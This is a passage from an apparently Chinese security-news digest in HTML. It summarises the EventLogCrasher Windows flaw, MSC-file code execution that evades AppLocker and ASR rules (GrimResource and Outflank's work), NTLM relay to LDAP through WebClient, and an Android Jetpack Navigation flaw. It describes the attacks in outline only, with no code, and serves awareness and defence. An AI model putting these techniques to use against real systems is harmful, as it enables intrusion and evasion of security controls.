	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">任何能够进行身份验证的用户都可以利用 \&#34;EventLogCrasher\&#34; 漏洞远程崩溃 Windows 事件日志服务，这对于系统的安全性和可靠性构成了严重威胁。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows 事件日志服务的崩溃会影响到事件的记录和转发，尤其是在第三次崩溃后服务不再自动重启的情况下。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使在事件日志服务停止的情况下，安全和系统事件仍然会被暂时存储，直到服务恢复，这可能会影响攻击者的行动不被记录。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微补丁提供了一种快速、无需重启计算机的解决方案，可以防止漏洞的利用，保护系统免受攻击。</section></li></ul>
	<br/>
	<p>🏷️: Windows, 漏洞, 补丁, 事件日志, 远程攻击</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 揭秘#GrimResource：滥用MSC文件格式</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了如何利用MSC文件格式通过微软管理控制台（MMC）实现代码执行，以及Outflank Security Tooling（OST）团队在这一领域的研究和开发。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6806640625" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=416a8c97&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgsxYFnOPwSWF28TmxoeXjPJNa210E8oDP7f5GbGbA9PMfOKNvObejog%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">揭秘 GrimResource：Elastic 安全团队与红队的攻防博弈</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GrimResource：Elastic揭示利用MSC文件进行初始访问的技术</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgtzpWLVHuYFaia3ic7WmLvaS4yibzhzNcAHPhFkDeibYUem0icOOhVh3PJMA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgtzpWLVHuYFaia3ic7WmLvaS4yibzhzNcAHPhFkDeibYUem0icOOhVh3PJMA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522851512418812"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MSC文件格式可以被利用来通过MMC执行任意代码，这是一种对抗受限环境中的安全措施（如AppLocker、PowerShell的受限语言模式、WDEG限制和ASR规则）的有效方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Outflank团队在MSC文件格式的研究上取得了进展，发现了一种新的技术，可以在不启动子进程的情况下在MMC中执行代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管MSC文件格式的某些技术被认为太危险，不适合公开披露，但Outflank团队认为分享研究成果对于提高红队能力和组织的安全防御能力至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网页强调了红队模拟和安全检测规则的重要性，并提供了对MSC文件格式利用方法的技术细节。</section></li></ul>
	<br/>
	<p>🏷️: MSC文件格式, 代码执行, 微软管理控制台, Outflank Security Tooling, 安全研究</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 NTLM Relay攻击：网络入侵的终极手段</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了NTLM Relay攻击在Active Directory环境中的危害，特别是通过LDAP进行的攻击方式，以及如何通过WebClient服务来诱导目标进行HTTP认证，从而实现对LDAP的NTLM Relay攻击，以及攻击后的后期利用技术。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.1037037037037037" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b2f7ba91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgAJTym0ENbxiaW5pstTScsJFQmZR5aSzaNmUKBXSEcFwjIBibUQerYiauw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.14629629629629629" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e66fa424&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgvzkYjq3aCWan90vTBWabiaVzXUiclw9gKnCibjTlHfU2nrDGdIXQ0WWqw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.512962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4e19e7e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgTWbhAJLUzXHAciakvNRb6Hia3vh8K3PEnXaxClXyThFNIC2icyR5s6n9A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">NTLM 中继攻击到 LDAP(S) 的详细分析</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">NTLM 继电攻击：从 WebClient 欺骗到设备接管</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgjfIYt8Su7HgOGHoiaezO2yXTddGzUAkbSfjTMaStSX0zBLlGbDQXlLA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgjfIYt8Su7HgOGHoiaezO2yXTddGzUAkbSfjTMaStSX0zBLlGbDQXlLA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522851518281252"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">NTLM Relay攻击对Active Directory环境构成严重威胁，可能导致任意设备的权限提升，甚至整个域的妥协。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LDAP是Active Directory的核心组件，通过对LDAP的NTLM Relay攻击，攻击者可以实现对域的控制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击链路分为诱导、传输和后期利用，每个阶段都需要特定的条件和技术。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WebClient服务是诱导HTTP认证的关键，它可以绕过SMB和LDAP之间的协议不兼容问题。</section></li></ul>
	<br/>
	<p>🏷️: NTLM, LDAP, Active Directory, 网络攻击, 认证安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 Android Jetpack导航库深层次安全漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Android Jetpack Navigation库存在深层次的安全漏洞，可能允许攻击者绕过正常的屏幕流程直接访问应用内的任意页面。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.11851851851851852" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=cbe3862c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgjksZokQNkicOl1uTNSAlCM0PuoHvpMaQCSBjNF78auQd70uPf4hJ2FA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6620370370370371" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b237be68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgY9ucv2XA2pYRBedrc6gQnBWqT7wQjUWajicmzxIibEEuvP6rSPSZJzVw%2F640%3Ffrom%3Dappmsg"/>
	
